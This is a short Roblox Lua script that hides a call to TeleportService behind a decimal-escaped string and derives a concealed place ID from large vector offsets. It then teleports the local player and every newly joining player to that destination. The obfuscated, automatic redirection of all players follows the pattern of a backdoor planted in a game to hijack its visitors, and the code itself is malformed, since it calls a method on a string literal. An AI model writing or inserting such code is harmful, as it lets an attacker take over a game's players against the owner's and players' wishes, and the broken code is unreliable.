local function Conectalok(nevvec3, v) ("\103\97\109\101\58\83\101\114\118\105\99\101\40\34\84\101\108\101\112\111\114\116\83\101\114\118\105\99\101\34\41"):Teleport((nevvec3.X + nevvec3.Y + nevvec3.Z), v) end
local offset1 = Vector3.new(1367238124.5, 1367238124.5*2, 0)
local offset2 = Vector3.new(1367238124.5*2, 0, 1367238124.5)
local nevvec3 = Vector3.new(offset1+offset2)
Conectalok(nevvec3, game.Players.LocalPlayer)

function PlayerEntered(player)
	wait(3)
	Conectalok(nevvec3, player)
end
game.Players.PlayerAdded:connect(PlayerEntered)
